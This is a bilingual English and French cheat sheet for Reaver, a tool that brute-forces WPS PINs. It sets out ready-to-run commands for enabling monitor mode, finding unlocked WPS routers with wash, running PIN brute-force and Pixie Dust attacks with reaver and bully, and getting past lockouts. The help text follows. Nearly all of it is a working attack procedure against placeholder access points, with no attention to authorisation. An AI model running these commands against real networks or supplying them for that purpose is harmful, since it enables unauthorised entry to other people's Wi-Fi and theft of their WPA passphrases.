Reaver
Outil de brute-force du PIN WPS. Exploite une faille de conception du protocole WPS pour récupérer les passphrases WPA/WPA2 des routeurs équipés du WPS. WPS PIN brute-force attack tool. Exploits the WPS protocol design flaw to recover WPA/WPA2 passphrases from WPS-enabled routers.
↗ https://github.com/t6x/reaver-wps-fork-t6xOverview
Reaver exploits a design flaw in the WPS (Wi-Fi Protected Setup) protocol to brute-force the 8-digit PIN. Due to how WPS validates PINs in two halves, the effective keyspace is only 11,000 combinations rather than 100 million. A successful attack recovers the WPA/WPA2 passphrase.
Prerequisites
# Enable monitor mode first
airmon-ng check kill
airmon-ng start wlan0
# interface is now wlan0mon
Find WPS-enabled targets
wash -i wlan0mon # List WPS networks and their lock status
Basic Attack
Attack a specific WPS-enabled AP
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
With more verbose output
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 2 -r 3:30
Slower but more reliable (avoids lockouts)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --delay=3 --lock-delay=60
Pixie Dust Attack (pixiewps)
Much faster than PIN brute-force — works instantly on vulnerable routers:
Pixie Dust via reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K 1
Alternative: bully with pixie dust
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF --pixie -v 3
Scanning for WPS Targets
wash — list WPS networks
sudo wash -i wlan0mon
# Output:
# BSSID Ch dBm WPS Lck Vendor ESSID
# AA:BB:CC:DD:EE:FF 6 -70 2.0 No Ralink MyNetwork
# Fields of interest:
# WPS: WPS version
# Lck: WPS locked (Yes = lockout active, No = can attack)
Dealing with WPS Lockouts
Check if locked with wash
sudo wash -i wlan0mon | grep AA:BB:CC:DD:EE:FF
Wait for lockout to expire (usually 5-60 minutes) Then resume:
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --lock-delay=60
Resume from saved session
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --session=AA:BB:CC:DD:EE:FF.wpc
Fake Auth (if required)
Some APs require association before WPS negotiation
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -A
Options for Difficult Targets
Slow down attack (reduce lockout risk)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 10 --lock-delay=300
Specify channel
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv
Ignore timeouts
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF --timeout=10 --fail-wait=360
Start from a specific PIN
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p 12345670
Tips
- Try Pixie Dust (
-K 1) first — it’s instantaneous on vulnerable routers - Check
washfor WPS lock status before attacking to avoid wasting time --lock-delay=300waits 5 minutes when a lock is detected before retrying- WPS is disabled on modern routers by default; always check
washfor enabled APs - The PIN brute-force can take 4-10 hours on routers without lockout protection
Help / Man page
reaver -i <iface> -b <bssid> [options]
Required:
-i iface Monitor mode interface
-b BSSID Target AP BSSID
Options:
-c channel Set channel (auto-detect if omitted)
-e ESSID Target ESSID
-A Don't associate before attack
-f Fake EAPOL Start before each negotiation
-N Don't send NACK on errors
-S Use small DH keys to speed up attack
-L Ignore locked state
-E Terminate each association after each attempt
-d delay Delay between attempts (default: 1)
-l delay Time to wait when locked (default: 315)
-r N:secs After N attempts, sleep for secs
-K N Run Pixie Dust attack (1=pixiewps)
-p PIN Start from specific PIN
-vv Very verbose output
-q Less verbose output
Vue d’ensemble
Reaver exploite une faille de conception dans le protocole WPS (Wi-Fi Protected Setup) pour brute-forcer le PIN à 8 chiffres. En raison de la façon dont le WPS valide les PIN en deux moitiés, l’espace de clés effectif n’est que de 11 000 combinaisons plutôt que 100 millions. Une attaque réussie récupère la passphrase WPA/WPA2.
Prérequis
# Activer d'abord le mode monitor
airmon-ng check kill
airmon-ng start wlan0
# l'interface est maintenant wlan0mon
Trouver des cibles équipées du WPS
wash -i wlan0mon # Lister les réseaux WPS et leur statut de verrouillage
Attaque basique
# Attaquer un AP WPS spécifique
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Avec une sortie plus verbeuse
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 2 -r 3:30
# Plus lent mais plus fiable (évite les lockouts)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --delay=3 --lock-delay=60
Attaque Pixie Dust (pixiewps)
Bien plus rapide que le brute-force de PIN : fonctionne instantanément sur les routeurs vulnérables :
# Pixie Dust via reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K 1
# Alternative : bully avec pixie dust
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF --pixie -v 3
Recherche de cibles WPS
# wash : lister les réseaux WPS
sudo wash -i wlan0mon
# Sortie :
# BSSID Ch dBm WPS Lck Vendor ESSID
# AA:BB:CC:DD:EE:FF 6 -70 2.0 No Ralink MyNetwork
# Champs d'intérêt :
# WPS : version du WPS
# Lck : verrouillage WPS (Yes = lockout actif, No = attaque possible)
Gérer les lockouts WPS
# Vérifier le verrouillage avec wash
sudo wash -i wlan0mon | grep AA:BB:CC:DD:EE:FF
Attendre l’expiration du lockout (généralement 5 à 60 minutes), puis reprendre :
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --lock-delay=60
Reprendre depuis une session sauvegardée
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --session=AA:BB:CC:DD:EE:FF.wpc
Fausse authentification (si nécessaire)
Certains AP requièrent une association avant la négociation WPS
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -A
Options pour cibles difficiles
# Ralentir l'attaque (réduire le risque de lockout)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 10 --lock-delay=300
# Spécifier le canal
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv
# Ignorer les timeouts
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF --timeout=10 --fail-wait=360
# Démarrer depuis un PIN spécifique
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p 12345670
Conseils
- Essayer Pixie Dust (
-K 1) en premier : c’est instantané sur les routeurs vulnérables - Vérifier
washpour le statut de verrouillage WPS avant d’attaquer pour éviter de perdre du temps --lock-delay=300attend 5 minutes quand un verrouillage est détecté avant de réessayer- Le WPS est désactivé par défaut sur les routeurs modernes ; toujours vérifier
washpour les AP l’ayant activé - Le brute-force de PIN peut prendre 4 à 10 heures sur des routeurs sans protection contre les lockouts
Aide / Page de manuel
reaver -i <iface> -b <bssid> [options]
Required:
-i iface Monitor mode interface
-b BSSID Target AP BSSID
Options:
-c channel Set channel (auto-detect if omitted)
-e ESSID Target ESSID
-A Don't associate before attack
-f Fake EAPOL Start before each negotiation
-N Don't send NACK on errors
-S Use small DH keys to speed up attack
-L Ignore locked state
-E Terminate each association after each attempt
-d delay Delay between attempts (default: 1)
-l delay Time to wait when locked (default: 315)
-r N:secs After N attempts, sleep for secs
-K N Run Pixie Dust attack (1=pixiewps)
-p PIN Start from specific PIN
-vv Very verbose output
-q Less verbose output